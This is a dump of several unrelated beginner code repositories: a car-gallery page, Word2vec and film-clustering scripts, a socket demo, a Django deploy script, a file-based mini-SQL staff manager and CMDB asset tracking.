width="200" height="100" name="mobilAvanza" border=0> </a> <p> <font-family face="Arial" ><center>Toyota Avanza</center></font-family> </p> </div> <div class="trending-car"> <a href="#" onMouseOver ="gantiGambar (mobilTerios, gantiGambarTerios[baru])" onMouseout ="gantiGambar (mobilTerios, gantiGambarTerios[sumber])"> <img src="img/terios.jpg" width="200" height="100" name="mobilTerios" border=0> </a> <p> <font-family face="Arial" ><center>Daihatsu Terios</center></font-family> </p> </div> <div class="trending-car"> <a href="#" onMouseOver ="gantiGambar (mobilJazz, gantiGambarJazz[baru])" onMouseout ="gantiGambar (mobilJazz, gantiGambarJazz[sumber])"> <img src="img/jazz.jpg" width="200" height="100" name="mobilJazz" border=0> </a> <p> <font-family face="Arial" ><center>Honda Jazz</center></font-family> </p> </div> <div class="trending-car"> <a href="#" onMouseOver ="gantiGambar (mobilAPV, gantiGambarAPV[baru])" onMouseout ="gantiGambar (mobilAPV, gantiGambarAPV[sumber])"> <img src="img/apv.jpg" width="200" height="100" name="mobilAPV" border=0> </a> <p> <font-family face="Arial" ><center>Suzuki APV</center></font-family> </p> </div> <div class="trending-car"> <a href="#" onMouseOver ="gantiGambar (mobilBrio, gantiGambarBrio[baru])" onMouseout ="gantiGambar (mobilBrio, gantiGambarBrio[sumber])"> <img src="img/brio.jpg" width="200" height="100" name="mobilBrio" border=0> </a> <p> <font-family face="Arial" ><center>Honda Brio</center></font-family> </p> </div> <div class="trending-car"> <a href="#" onMouseOver ="gantiGambar (mobilExpander, gantiGambarExpander[baru])" onMouseout ="gantiGambar (mobilExpander, gantiGambarExpander[sumber])"> <img src="img/expander.jpg" width="200" height="100" name="mobilExpander" border=0> </a> <p> <font-family face="Arial" ><center>Honda Brio</center></font-family> </p> </div> <br class="clear"> </div> <script> var sumber = 0; var baru = 1; function ciptakanArray (gambarAwal, gambarBaru){ var arrayGambar = new Array; arrayGambar[sumber] = new Image; arrayGambar[sumber].src = gambarAwal; arrayGambar[baru] = new Image; arrayGambar[baru].src = gambarBaru; return arrayGambar; } function gantiGambar (gambarTarget, gambarTampil){ gambarTarget.src = gambarTampil.src; } var gantiGambarAvanza = ciptakanArray ("img/avanza.jpg", "img/avanza_banyak.jpg") var gantiGambarTerios = ciptakanArray ("img/terios.jpg", "img/terios_banyak.jpg") var gantiGambarJazz = ciptakanArray ("img/jazz.jpg", "img/jazz_banyak.jpg") var gantiGambarAPV = ciptakanArray ("img/apv.jpg", "img/apv_banyak.jpg") var gantiGambarBrio = ciptakanArray ("img/brio.jpg", "img/brio_banyak.jpg") var gantiGambarExpander = ciptakanArray ("img/expander.jpg", "img/expander_banyak.jpg") </script> <?php include("footer.php"); ?> </body> </html>
65f5a31d4fed5fc864d61506c6d463c13bd2f863
[ "Markdown", "PHP" ]
7
PHP
ihsantaofik94/MobilIndonesia.com
14eaf305b107719f3938978c4e5c4ba52767687e
c7334f0ecd610212c20f5bd2e6a0760165c5a286
refs/heads/master
<repo_name>UDIC-lab-NCHU/hsiang_project<file_sep>/Word2vec/grep_cal_cp.sh #!/bin/bash python find_similar_word.py $1 READFILE="similar_word.txt" i=0 while read line; do arr[$i]="$line" i=$(($i+1)) done < $READFILE for array in "${arr[@]}" do grep -w $array topic_find_data > similar_word.topic python grep_cal_relation_w2v.py similar_word.topic $array done <file_sep>/Word2vec/find_similar_word_cp.py # -*- coding: utf-8 -*- import gensim,sys model = gensim.models.Word2Vec.load("wiki.zh.text.model") result=model.most_similar(sys.argv[1].decode('utf8')) with open('similar_word.txt', 'w') as the_file: for e in result: the_file.write(e[0].encode('utf8')+'\n') <file_sep>/Cluster/test.py import os with open("/home/nchu-csie/hsiang_project/Cluster/document_cluster/synopses_list_imdb.txt") as f: content = f.readlines() print content <file_sep>/Word2vec/grep_cal_relation_w2v_cp.py # -*- coding: utf-8 -*- import json,codecs import gensim,sys similar=[] relation={} dic={} i=0 with open('data.json', 'rb') as fp: dic = json.loads(fp.read().decode('utf8')) with open(sys.argv[1], 'rb') as fp: for line in fp: if line != "": (key1, key2, val) = line.split() key1=key1.decode('utf8') key2=key2.decode('utf8') if key1==sys.argv[2].decode('utf8'): if key2 in dic: dic[key2]+=val else: dic[key2]=val elif key2==sys.argv[2].decode('utf8'): if key1 in dic: dic[key1]=val else: dic[key1]=val with codecs.open("data.json", 'w',encoding='utf-8') as fout: json.dump(dic,fout,ensure_ascii=False,indent=4) <file_sep>/Cluster/stopwords.py from __future__ import print_function import numpy as np import pandas as pd import nltk import re import os import codecs from sklearn import feature_extraction import mpld3 from nltk.stem.snowball import SnowballStemmer from sklearn.feature_extraction.text import TfidfVectorizer from sklearn.metrics.pairwise import cosine_similarity from sklearn.cluster import KMeans from sklearn.externals import joblib def tokenize_and_stem(text): # first tokenize by sentence, then by word to ensure that punctuation is caught as it's own token tokens = [word for sent in nltk.sent_tokenize(text) for word in nltk.word_tokenize(sent)] filtered_tokens = [] # filter out any tokens not containing letters (e.g., numeric tokens, raw punctuation) for token in tokens: if re.search('[a-zA-Z]', token): filtered_tokens.append(token) stems = [stemmer.stem(t) for t in filtered_tokens] return stems def tokenize_only(text): # first tokenize by sentence, then by word to ensure that punctuation is caught as it's own token tokens = [word.lower() for sent in nltk.sent_tokenize(text) for word in nltk.word_tokenize(sent)] filtered_tokens = [] # filter out any tokens not containing letters (e.g., numeric tokens, raw punctuation) for token in tokens: if re.search('[a-zA-Z]', token): filtered_tokens.append(token) return filtered_tokens stopwords = nltk.corpus.stopwords.words('english') print(stopwords[:10]) stemmer = SnowballStemmer("english") #not super pythonic, no, not at all. #use extend so it's a big flat list of vocab totalvocab_stemmed = [] totalvocab_tokenized = [] synopses=[] synopsis="" for line in open('/home/nchu-csie/hsiang_project/Cluster/synopses_list_imdb.txt'): line=line.rstrip('\n') if line == " BREAKS HERE": synopses.append(synopsis) synopsis="" elif line not in ['\n', '\r\n']: synopsis+=line cnt=0 for line in open('/home/nchu-csie/hsiang_project/Cluster/synopses_list_wiki.txt'): line=line.rstrip('\n') if "BREAKS HERE" in line: synopses[cnt]+=synopsis synopsis="" cnt+=1 elif line not in ['\n', '\r\n'] and "Plot [edit] [ [ edit edit ] ]" not in line: synopsis+=line for i in synopses: allwords_stemmed = tokenize_and_stem(i.decode('utf8')) #for each item in 'synopses', tokenize/stem totalvocab_stemmed.extend(allwords_stemmed) #extend the 'totalvocab_stemmed' list allwords_tokenized = tokenize_only(i.decode('utf8')) totalvocab_tokenized.extend(allwords_tokenized) vocab_frame = pd.DataFrame({'words': totalvocab_tokenized}, index = totalvocab_stemmed) print ('there are ' + str(vocab_frame.shape[0]) + ' items in vocab_frame') print (vocab_frame.head()) #define vectorizer parameters tfidf_vectorizer = TfidfVectorizer(max_df=0.8, max_features=200000, min_df=0.2, stop_words='english', use_idf=True, tokenizer=tokenize_and_stem, ngram_range=(1,3)) tfidf_matrix = tfidf_vectorizer.fit_transform(synopses) #fit the vectorizer to synopses print(tfidf_matrix.shape) terms = tfidf_vectorizer.get_feature_names() dist = 1 - cosine_similarity(tfidf_matrix) num_clusters = 5 km = KMeans(n_clusters=num_clusters) km.fit(tfidf_matrix) clusters = km.labels_.tolist() print(km) joblib.dump(km, 'doc_cluster.pkl') km = joblib.load('doc_cluster.pkl') clusters = km.labels_.tolist() titles=[] titles = [line.rstrip('\n') for line in open('/home/nchu-csie/hsiang_project/Cluster/title_list.txt')] ranks = [line for line in range(1,101)] genres=[] genres = [line.rstrip('\n') for line in open('/home/nchu-csie/hsiang_project/Cluster/title_list.txt')] films = { 'title': titles, 'rank': ranks, 'synopsis': synopses, 'cluster': clusters, 'genre': genres } frame = pd.DataFrame(films, index = [clusters] , columns = ['rank', 'title', 'cluster', 'genre']) frame['cluster'].value_counts() #number of films per cluster (clusters from 0 to 4) print(frame['cluster'].value_counts()) #number of films per cluster (clusters from 0 to 4) grouped = frame['rank'].groupby(frame['cluster']) #groupby cluster for aggregation purposes grouped.mean() #average rank (1 to 100) per cluster print (grouped.mean()) print("Top terms per cluster:") print() #sort cluster centers by proximity to centroid order_centroids = km.cluster_centers_.argsort()[:, ::-1] for i in range(num_clusters): print("Cluster %d words:" % i, end='') for ind in order_centroids[i, :6]: #replace 6 with n words per cluster print(' %s' % vocab_frame.ix[terms[ind].split(' ')].values.tolist()[0][0].encode('utf-8', 'ignore'), end=',') print() #add whitespace print() #add whitespace print("Cluster %d titles:" % i, end='') for title in frame.ix[i]['title'].values.tolist(): print(' %s,' % title, end='') print() #add whitespace print() #add whitespace print() print()
be2d8d9434510a0fcee24d9548cf395025693e51
[ "Python", "Shell" ]
5
Shell
UDIC-lab-NCHU/hsiang_project
be580952d4a4a408c82ca2e60cab076f4111594c
666bebc56909346b950a3b192875f18e8e8b952d
refs/heads/master
<file_sep>////////////////////////////////////////////////////////////////// //BOARD ////////////////////////////////////////////////////////////////// var Board = function( selector ) { var self = this; var boardList = new List(); function initialize() { self.$elem = $( selector ); self.$elem.dblclick(function(a) { x = a.pageX + "px"; y = a.pageY + "px"; if (a.target == this) { self.addPostIt(x, y); }; }); self.deletePostIt(); }; initialize(); }; Board.prototype.addPostIt = function(x, y){ var postIt = new PostIt(); postIt.$elem.css({ "position": "absolute", "left": x, "top": y, "z-index": ++PostIt.zIndex }); // self.boardList.push(postIt.$elem); this.$elem.append(postIt.$elem); }; Board.prototype.deletePostIt = function(){ var self = this; this.$elem.on("click",".close", function(){ $(this).parent().parent().remove(); }); }; ////////////////////////////////////////////////////////////////// //POST IT ////////////////////////////////////////////////////////////////// var PostIt = function() { var self = this; string = "<div class='post-it'><div class='header'><div class='close'>X</div></div><div class='content' contentEditable='true'></div></div>"; function initialize () { self.$elem = $(string); self.moveToFront(); self.$elem.draggable({ handle: "div.header" }); }; initialize(); }; PostIt.prototype.stopPropagation = function(){ $(".post-it").on("dblclick", function(event){ event.stopPropagation(); }); } PostIt.prototype.moveToFront = function(){ this.$elem.on("mousedown", function(event){ $(this).css({ "z-index": ++PostIt.zIndex }); }); } PostIt.zIndex = 0; //////////////////////////////////////////////////////////////////// //LIST //////////////////////////////////////////////////////////////////// var List = function(){ //selector var self = this; function initialize(){ self.array = new Array(); // self.element = $(selector); }; initialize(); }; List.prototype.select = function(){ $("li").on("click", function(){ alert("dimos click"); }); } //////////////////////////////////////////////////////////////////// $(function() { // Esta es la función que correrá cuando este listo el DOM // var zindex = 0; // $(".post-it").on("click", function(){ // console.log("entramos"); // $(this).style.zIndex = ++zindex; // }); $("#new_board").on("click", function(){ var boardName = prompt("Name of the board:"); $("#boards").append("<li class='lista'>" + boardName + "</li>"); var list = new List(); list.select(); // $(".list-end").before("<p class='list'>" + boardName + "</p>"); var board = new Board("#board"); }); });
f3d203768122f6c8b498d7475dc214664211abf8
[ "JavaScript" ]
1
JavaScript
sabefo/JS-PostIt
16df9f764e49efaa9f4e846b8d9eb911bd5e5b07
ba6ec0fabaa018e006cc6ce0db010918a6f6e55c
refs/heads/master
<repo_name>huningfei/python<file_sep>/day16/01 简版socketserver.py import socket sk = socket.socket() sk.bind(('127.0.0.1', 8080)) sk.listen() while 1: conn, addr = sk.accept() # 接收消息 data = conn.recv(8000) print(data) # 回复消息 # 按照约定好的格式回复消息 conn.send(b'http/1.1 200 ok\r\n\r\no98k') conn.close() <file_sep>/deploy/script/put_script.py #!/usr/bin/env python # -*- coding:utf-8 -*- """ 1. 解压缩 2. 软连接 3. 杀掉原进程 4. 启动程序 """ import os import sys import shutil from subprocess import check_output, check_call, CalledProcessError from zipfile import ZipFile CODE_BASE_PATH = "/data/deploy/codes/" WEB_BASE_PATH = "/data/web_root" def unpack_zipfile(project_name, version, file_name): """ 解压文件 例如: /data/deploy/codes/dbhot/v1/dbhot20181207030727.zip /data/deploy/codes/dbhot/v1/dbhot20181207030727 类似于: unzip -d /data/codes/dbhot/v1/dbhot20181207030727 /data/codes/dbhot/v1/dbhot20181207030727.zip :return: """ zip_file_path = os.path.join(CODE_BASE_PATH, project_name, version, file_name) web_file_path = os.path.join(CODE_BASE_PATH, project_name, version, file_name.split('.')[0]) tar = ZipFile(zip_file_path, 'r') tar.extractall(path=web_file_path) tar.close() return web_file_path def link(web_file_path, project_name): """ 软链接 :return: """ if not os.path.exists(WEB_BASE_PATH): os.makedirs(WEB_BASE_PATH) link_path = os.path.join(WEB_BASE_PATH, project_name) if os.path.exists(link_path): os.remove(link_path) os.symlink(web_file_path, link_path) return link_path def kill_origin_process(match_key): """ 获取指定进程PID :param name: :return: """ check_command = "ps -ef |grep '%s' | grep -v grep | awk '{print $2}' " % (match_key) check_status = check_output(check_command, shell=True) if check_status: command = "ps -ef |grep '%s' | grep -v grep | awk '{print $2}' | xargs kill -9" % (match_key) check_call(command, shell=True) def start_service(project_name, start_command): """ 启动服务 :return: """ command = "%s >/dev/null 2>&1 & " % (start_command,) web_file_path = os.path.join(WEB_BASE_PATH, project_name) # 启动 check_call(command, shell=True, cwd=web_file_path) return True def run(): project_name = sys.argv[1] version = sys.argv[2] file_name = sys.argv[3] web_file_path = unpack_zipfile(project_name, version, file_name) link_path = link(web_file_path, project_name) kill_status = kill_origin_process('python3 manage.py runserver 0.0.0.0:8001') start_status = start_service(project_name, 'python3 manage.py runserver 0.0.0.0:8001') if __name__ == '__main__': run()<file_sep>/复习/深浅copy和小数据池.py #浅copy # 对于浅copy来说,第一层创建的是新的内存地址,而从第二层开始,指向的都是同一个内存地址,所以,对于第二层以及更深的层数来说, # 保持一致性。 # l1 = [1,2,3,['barry','alex']] # l2=l1.copy() # # print(l2) # print(l1,id(l1)) #[1, 2, 3, ['barry', 'alex']] 2916415390600 # print(l2,id(l2)) #[1, 2, 3, ['barry', 'alex']] 2916416395912 # l1[1]=222 # print(l1,id(l1))#[1, 222, 3, ['barry', 'alex']] 2916415390600 l1的值改变了,而l2的值没有变 # print(l2,id(l2)) #[1, 2, 3, ['barry', 'alex']] 2916416395912 # l1[3][0]='wusir' #l1和l2的值是一样的。 # print(l1,id(l1[3]))#[1, 2, 3, ['wusir', 'alex']] 2654134573768 # print(l2,id(l2[3]))#[1, 2, 3, ['wusir', 'alex']] 2654134573768 #深拷贝deepcopy # 对于深copy来说,两个是完全独立的,改变任意一个的任何元素(无论多少层),另一个绝对不改变。 # import copy # l1 = [1,2,3,['barry','alex']] # l2 = copy.deepcopy(l1) # print(l1,id(l1)) # print(l2,id(l2)) # l1[1]=222 # print(l1,id(l1)) # print(l2,id(l2)) # l1[3][0] = 'wusir' # print(l1,id(l1[3])) # print(l2,id(l2[3])) #小数据池 #python中 有小数据池的概念。 # int -5 ~256 的相同的数全都指向一个内存地址,节省空间。 # str:s = 'a' * 20 以内都是同一个内存地址 a=5 b=5 print(type(a)) print(id(a))#1406758496 print(id(b))#1406758496 print(a is b ) user1='12' user2='12' print(id(user1)) #2675065969552 print(id(user2))#2675065969552 <file_sep>/day23/auto - 2 - 固定二级菜单示例/web/urls.py from django.conf.urls import url, include from web.views import home urlpatterns = [ url(r'^add_user/', home.add_user), url(r'^info/', home.info), url(r'^del_user/(\d+)/$', home.del_user), url(r'^edit_user/(\d+)/$', home.edit_user), url(r'^user/', home.userlist), url(r'^add_order/', home.add_order), url(r'^orderlist/', home.orderlist), url(r'^orderinfo/', home.orderinfo), url(r'^del_order/(\d+)/$', home.del_order), url(r'^edit_order/(\d+)/$', home.edit_order), ] <file_sep>/day8/粘包/server.py import socket sk=socket.socket() sk.bind(('127.0.0.1',8080)) sk.listen() conn,addr=sk.accept() data1=conn.recv(10) data2=conn.recv(10) print(data1.decode('utf-8')) print(data2.decode('utf-8')) conn.close() sk.close() <file_sep>/day4/优秀的作业/优秀的作业/孙鹏飞/day4作业/staff_manager.py #!/usr/bin/env python3 # day4博客地址:http://www.cnblogs.com/spf21/p/8919716.html from tabulate import tabulate import os user_status = {"user": None, "status": False} FILE_PATH = "./file/" TABLE_PATH = "./table/" TABLE = "%suser_info" % TABLE_PATH USER_FILE = "%suser_list" % FILE_PATH readme = "%shelp_file" % FILE_PATH def mysql_help(): """ 帮助文档 :return: """ with open(readme, mode="r", encoding="utf-8") as f1: print("*" * 100) for i in f1: print(i, end="") print("\n" + "*" * 100) def print_log(meg, type_info="error"): """ 修改输出颜色 :param meg: :param type_info: :return: """ if type_info == "info": print("\033[32;0m%s\033[0m" % meg) elif type_info == "error": print("\033[31;0m%s\033[0m" % meg) def table_list(path): """ 获取所有的表 :param path: :return: """ for root, dirs, files in os.walk(path): return files def show_tables(): """ 查看所有的表 :return: """ for i in T_LIST: print_log(i) def wrapper(main_func): """ 登录装饰器 :param main_func: :return: """ def inner(*args, **kwargs): if user_status["user"] and user_status["status"]: result = main_func(*args, **kwargs) if result != None: return result else: str_func = "%s " % (main_func,) if "blog_exit" in str_func: print_log("Bye Bye!!!".center(40, "-"), "error") exit() if "log_out" in str_func: print_log("用户未登录!!!", "error") exit() print(">>>欢迎登录MySQL:") count = 0 while count < 3: username = input("请输入用户名:").strip() password = input("请输入密码:").strip() if not username or not password: print_log("用户名或密码不能为空", "error") with open(USER_FILE) as f1: for i in f1: user, passwd = i.split() if username == user and password == passwd: print_log("登录成功!欢迎:<%s>" % (username,)) user_status["user"] = username user_status["status"] = True main_func() else: print_log("用户名或者密码错误,请重试!") count += 1 else: exit() return inner def local_table(t_file): """ 把文件转换成字典类型 {'id': ['1', '2', '3'], 'name': ['Alex', 'Egon', 'nezha'], 'age': ['22', '23', '25'], 'phone': ['13651054608', '13304320533', '1333235322'], 'job': ['IT', 'Tearcher', 'IT']} :param t_file: :return: """ n = 1 table_dic = {} line_info_tmp = [] with open(t_file) as f1: for line in f1: line = line.strip() # global line_title # 生命一个全局变量 if n == 1: global line_title # 生命一个全局变量 line_title = line.split(",") else: global line_info line_info = line.split(",") line_info_tmp.append(line_info) n += 1 count = 0 for i_title in line_title: # line_title = [id,name,age,phone,job] table_dic[i_title] = [] for i_info in line_info_tmp: # line_info_tmp = [[1,alex,22,185422342342,it], [2,spf,22,185422342342,it]] table_dic[i_title].append(i_info[count]) count += 1 # print(table_dic) return table_dic def local_file(argv): """ 把修改后的字典写入到文件中 :param arv: = 修改后的Table_DATA {'id': ['1', '2', '3'], 'name': ['Alex', 'Egon', 'nezha'], 'age': ['22', '23', '25'], 'phone': ['13651054608', '13304320533', '1333235322'], 'job': ['IT', 'Tearcher', 'IT']} :return: """ # ['1', '2', '3'] ['Alex', 'Egon', 'nezha'] ['22', '23', '25'] # [1,alex,22] # 1,alex,22 # 把字典转换成列表,在转成字符串写入到新的表文件,删除旧表文件,重命名新文件为旧文件 with open("info.bak", mode="a", encoding="utf-8") as f1: title = ",".join(line_title) # 获取title转换成字符串写入文件 f1.write(title + "\n") # li = [] # [['1', 'Alex', '22', '13651054608', 'linux'], ['2', 'Egon', '23', '13304320533', 'Tearcher'], ['3', 'nezha', '25', '1333235322', 'linux']] # for i in range(len(argv["id"])): # li_tmp = [] # li1 = ['1', 'Alex', '22', '13651054608', 'IT'] # for f in line_title: # li_tmp.append(argv[f][i]) # li.append(li_tmp) li = zip(*argv.values()) for i in li: info = ",".join(i) f1.write(info + "\n") os.remove(TABLE) os.rename("info.bak", TABLE) def syntax_select(where_data, query_section): """ 把where返回的结果根据字段打印出来 :param where_data: [['2', 'Egon', '23', '13304320533', 'Tearcher'], ['3', 'nezha', '25', '1333235322', 'IT']] :param query_section: # select name,age from info select * from info :return: """ fields_tmp = query_section.split("from")[0].split("select")[1].split(",") # 切割 query_section 成列表["age","name"] fields = [i.strip() for i in fields_tmp] # 去掉关键字的空格 for t_name in T_LIST: if t_name in query_section: if "*" in fields: fields = line_title res_li = [] # 用于存储匹配到的字段内容 每条记录以列表方式存储 res_li = [[23 ,Egon] ,[34,alex]] try: for i in where_data: # 循环 where查的数据 ['2', 'Egon', '23', '13304320533', 'Tearcher'] ['3', 'nezha', '25', '1333235322', 'IT']] li = [] # 存储字段对应的单条数据 li = [23,] --> li = [23 ,Egon] age:li = [alex,22] name = [Egon,34] for k in fields: # k = "age" k = "name" fields = [age,name] try: # i = ['2', 'Egon', '23', '13304320533', 'Tearcher'] index = line_title.index(k) # 返回字段对应的索引 # line_title = [id ,name, age ,phone,job] # age = 2 # name = 1 li.append(i[index]) # 添加字段对应的数据到列表 i = ['2', 'Egon', '23', '13304320533', 'Tearcher'] except ValueError: print_log("语法错误:%s列不存在!" % k) return res_li.append(li) print(tabulate(res_li, headers=fields, tablefmt="grid")) print_log("查到了%s行!" % len(where_data), "info") return except TypeError: print_log("语法错误:where没有跟条件", where_data) return else: print_log("语法错误:表不存在") return def syntax_insert(where_data, query_section): """ 插入 :param where_data: :param query_section: insert into info values(3,nezha,25,1333235322,IT); :return: """ if "values" in query_section: res_tmp = query_section.split("values")[1].split(",") res = [i.strip("()").strip() for i in res_tmp] if res[0].isdigit(): res[0] = str(int(Table_DATA["id"][-1]) + 1) res_w = ",".join(res) if len(res) != len(line_title): print_log("语法错误:需要%s个参数,你给了%s个" % (len(line_title), len(res)), "error") return else: if res[0] in Table_DATA["id"]: print_log("语法错误:ID重复", "error") else: if res[3] in Table_DATA["phone"]: print_log("语法错误:手机号重复") else: with open(TABLE, mode="a") as f1: f1.write(res_w + "\n") else: print_log("语法错误:缺少values") return def syntax_update(where_data, query_section): """ 更新 :param where_data: = [['2', 'Egon', '23', '13304320533', 'Tearcher'], ['3', 'Egon', '23', '13304320533', 'Tearcher']] :param query_section: = update info set age = 25 :return: """ # 根据 where_data 的id获取Table_DATA["id"]的索引,在根据索引去Table_DATA[字段]修改值 if "set" in query_section and "=" in query_section: # 判断语法是否有set res_tmp = query_section.split("set")[1].split("=") # 取出需要修改的字段和值 res = [i.strip() for i in res_tmp] # 去掉空格res = ["age", "25"] if where_data == None: print_log("语法错误:where语法有错,示例:where age > 23") return for line in where_data: # ['2', 'Egon', '23', '13304320533', 'Tearcher'] line_id = line[0] # 获取匹配到内容的ID # line_id = 2 index = Table_DATA["id"].index(line_id) # index = id 在 Table_DATA表id列的索引 index = 1 Table_DATA[res[0]][index] = res[1] # Table_DATA[res["age"]] = [22,23,30] print_log("影响了%s行!" % len(where_data), "info") return Table_DATA else: print_log("语法错误:缺少set或者 = ", "error") return # print(where_data) def syntax_delete(where_data, query_section): """ 根据where条件删除匹配行 :param where_data: = [['1', 'Alex', '22', '13651054608', 'IT'], ['3', 'nezha', '25', '1333235322', 'IT']] :param query_section: delete from info :return: """ if "from" in query_section: # 判断语法是否有from if where_data == None: print_log("语法错误:where语法错误,示例:where age > 23") return for line in where_data: line_id = line[0] # 获取匹配到内容的ID index = Table_DATA["id"].index(line_id) # index = id 在 Table_DATA表id列的索引 for dic_line in Table_DATA: # 删除获取到的索引对应多有值 Table_DATA[dic_line].pop(index) print_log("影响了%s行!" % len(where_data), "info") return Table_DATA else: print_log("语法错误:from", "error") return def op_gt(argv_fields, argv_value): """ 大于判断: 根据判断返回数据,以列表的方式 :param argv_fields: 字段:age :param argv_value: 判断的值:22 :return: """ data_res = [] # 空列表接受所有匹配到的参数 for index, value in enumerate(Table_DATA[argv_fields]): # 循环列表进行匹配,index记录匹配元素的索引 try: if float(value) > float(argv_value): # 匹配参数 l1 = [] # 空列表接受匹配到的单行 for key in Table_DATA.keys(): # 循环用户表获取匹配到的完整行 l1.append(Table_DATA[key][index]) # 根据索引匹配 并把匹配到的行添加到小列表中 data_res.append(l1) # 匹配到的行将以列表数据类型的存在data_res中 except ValueError: print_log("语法错误:字符串类型错误") return return data_res def op_lt(argv_fields, argv_value): """ 小于判断: 根据判断返回数据,以列表的方式 :param argv_fields: 字段:age :param argv_value: 判断的值:22 :return: """ data_res = [] for index, value in enumerate(Table_DATA[argv_fields]): if float(value) < float(argv_value): l1 = [] for key in Table_DATA.keys(): l1.append(Table_DATA[key][index]) data_res.append(l1) return data_res def op_eq(argv_fields, argv_value): """ 等于判断: 根据判断返回数据,以列表的方式 :param argv_fields: 字段:age :param argv_value: 判断的值:22 :return: """ data_res = [] for index, value in enumerate(Table_DATA[argv_fields]): if value == argv_value: l1 = [] for key in Table_DATA.keys(): l1.append(Table_DATA[key][index]) data_res.append(l1) return data_res def op_like(argv_fields, argv_value): """ 模糊匹配: 根据判断返回数据,以列表的方式 :param argv_fields: 字段:age :param argv_value: 判断的值:22 :return: """ data_res = [] for index, value in enumerate(Table_DATA[argv_fields]): if argv_value in value: l1 = [] for key in Table_DATA.keys(): l1.append(Table_DATA[key][index]) data_res.append(l1) return data_res def where_parser(section): """ where条件解析 :param section: 条件: age > 22 :return: """ choice = { ">": op_gt, "<": op_lt, "=": op_eq, "like": op_like } for choice_key, func in choice.items(): # 第一次进来 choice_key = ">" func = op_gt if choice_key in section: # 第一次进来 ">" in age > 22 fields, value = section.split(choice_key) # fields = age value = 22 if fields.strip() in line_title: # fields.strip() 去掉空格 line_title = [id,name,age,job] where_data = func(fields.strip(), value.strip()) # 执行对应的where判断,返回判断结果 return where_data # 返回给语法解析器 else: print_log("语法错误:%s字段不存在" % fields) return else: print_log("语法错误:缺少条件%s" % choice.keys(), "error") return def syntax_parser(cmd): """ 语法分析器 :param cmd: 语法:select name,age from info where age > 22 :return: """ choice_action = { "select": syntax_select, "insert": syntax_insert, "update": syntax_update, "delete": syntax_delete, "show": show_tables } cmd = cmd.strip() actions = ["select", "insert", "update", "delete", "show"] if cmd.split()[0] in actions: # 判断用户输入的语法是否正确(["select", "insert", "update", "delete"]) if "where" in cmd: query_section, where_section = cmd.split("where") # 根据where关键件把用户输入的命令切割成两部分,前半部分是增删改查方法,后半部分是where条件 where_data = where_parser(where_section) # 把where条件交给where函数进行解析判断,并返回解析判断值 func_res = choice_action[query_section.split()[0]](where_data, query_section) # 讲where_data返回的结果交给执行增删改成函数 if func_res != None: local_file(func_res) # func_res 等于修改后的TABLE_DATA else: query_section = cmd # query_section 默认值等于cmd where_section = "id > 0" # 条件默认为id > 0 where_data = where_parser(where_section) # 把where条件交给where函数进行分配判断 action = query_section.split()[0] # action = select ... if action == "show": show_tables() return if action == "update" or action == "delete": print_log("语法错误:修改或删除缺少where条件") return func_res = choice_action[action](where_data, query_section) # 执行增删改成函数 if func_res != None: local_file(func_res) # func_res 等于修改后的TABLE_DATA else: print_log("语法错误: %s" % actions, "error") return T_LIST = table_list(TABLE_PATH) Table_DATA = local_table(TABLE) @wrapper def main(): """ 主运行程序 :return: """ mysql_help() # 显示帮助 while True: global Table_DATA Table_DATA = local_table(TABLE) cmd = input("[info]>") if not cmd:continue syntax_parser(cmd) # 把sql语句交给语法分析器(syntax_parser)处理 if __name__ == "__main__": main() <file_sep>/cmdb/auto_server - 7 - 资产信息入库/api/service.py #!/usr/bin/python # -*- coding:utf-8 -*- from api import models def process_basic(request,hostname): basic_dict = {} print(basic_dict) basic_dict.update(request.data['basic']['data']) basic_dict.update(request.data['cpu']['data']) basic_dict.update(request.data['board']['data']) models.Server.objects.filter(hostname=hostname).update(**basic_dict) def process_disk(request,server): # 1.1 获取数据库中的硬盘信息 disk_queryset = models.Disk.objects.filter(server=server) # 1.2 最新汇报来的硬盘信息 disk_info = request.data['disk']['data'] disk_queryset_set = {row.slot for row in disk_queryset} disk_info_set = set(disk_info) update_disk_slot_list = disk_info_set & disk_queryset_set add_disk_slot_list = disk_info_set - disk_queryset_set del_disk_slot_list = disk_queryset_set - disk_info_set # 更新 for slot in update_disk_slot_list: # models.Disk.objects.filter(slot=slot, server=server).update(**disk_info[slot]) obj = models.Disk.objects.filter(slot=slot, server=server).first() # 找出对应的服务器上面对应的序号 row_dict = disk_info[slot] # 代表客户端发送过来的硬盘数据 record_list = [] for name, new_value in row_dict.items(): old_value = str(getattr(obj, name)) #都是字符串互相比较 if old_value != new_value: setattr(obj, name, new_value) verbose_name = models.Disk._meta.get_field(name).verbose_name msg = "【硬盘变更】槽位%s:%s由%s变更为%s" % (slot, verbose_name, old_value, new_value) record_list.append(msg) obj.save() if record_list: models.AssetRecord.objects.create(server=server, content=';'.join(record_list)) # 删除 models.Disk.objects.filter(server=server, slot__in=del_disk_slot_list).delete() if del_disk_slot_list: msg = "【硬盘变更】移除槽位%s上的硬盘" % (';'.join(del_disk_slot_list)) models.AssetRecord.objects.create(server=server, content=msg) # 添加 for slot in add_disk_slot_list: row_dict = disk_info[slot] row_record_list=[] for name, new_value in row_dict.items(): verbose_name = models.Disk._meta.get_field(name).verbose_name tpl = "%s:%s" % (verbose_name, new_value,) # 新增了那个硬盘 row_record_list.append(tpl) msg = "【硬盘变更】槽位%s新增硬盘,硬盘信息:%s" % (slot, ';'.join(row_record_list),) models.AssetRecord.objects.create(server=server, content=msg) row_dict['server'] = server models.Disk.objects.create(**row_dict) def process_nic(request,server): # 1.1 获取数据库中的硬盘信息 nic_queryset = models.NIC.objects.filter(server=server) # 1.2 最新汇报来的硬盘信息 nic_info = request.data['nic']['data'] nic_queryset_set = {row.name for row in nic_queryset} nic_info_set = set(nic_info) update_nic_slot_list = nic_info_set & nic_queryset_set add_nic_slot_list = nic_info_set - nic_queryset_set del_nic_slot_list = nic_queryset_set - nic_info_set # 更新 for nic_name in update_nic_slot_list: # models.NIC.objects.filter(name=name, server=server).update(**nic_info[name]) obj = models.NIC.objects.filter(name=nic_name, server=server).first() row_dict = nic_info[nic_name] record_list = [] for name, new_value in row_dict.items(): old_value = (getattr(obj, name)) if old_value != new_value: setattr(obj, name, new_value) verbose_name = models.NIC._meta.get_field(name).verbose_name msg = "【网卡变更】网卡%s:%s由%s变更为%s" % (nic_name, verbose_name, old_value, new_value) record_list.append(msg) obj.save() if record_list: models.AssetRecord.objects.create(server=server, content=';'.join(record_list)) # 删除 # for nic_name in del_nic_slot_list: models.NIC.objects.filter(server=server, name__in=del_nic_slot_list).delete() if del_nic_slot_list: msg = "【网卡变更】移除网卡%s" % (';'.join(del_nic_slot_list)) 